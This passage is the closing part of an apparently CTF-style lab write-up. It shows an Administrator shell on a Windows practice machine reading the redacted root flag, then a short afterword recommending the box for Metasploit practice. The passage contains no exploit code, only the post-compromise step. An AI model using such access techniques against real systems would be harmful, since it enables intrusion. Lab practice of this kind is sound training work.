18/03/2017  01:52     <DIR>          Pictures
18/03/2017  01:52     <DIR>          Saved Games
18/03/2017  01:52     <DIR>          Searches
18/03/2017  01:52     <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)   5.686.956.032 bytes free

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is EE82-226D

 Directory of C:\Users\Administrator\Desktop

18/03/2017  02:14     <DIR>          .
18/03/2017  02:14     <DIR>          ..
07/01/2024  07:49                 34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   5.686.956.032 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //32文字のRootFlag

Root flag obtained.

Afterword

A pretty easy machine. It might be good for practising or brushing up on Metasploit. I kind of like the double-peace-sign guy on this machine's icon.

[image: スクリーンショット 2024-01-02 2.13.45.png]
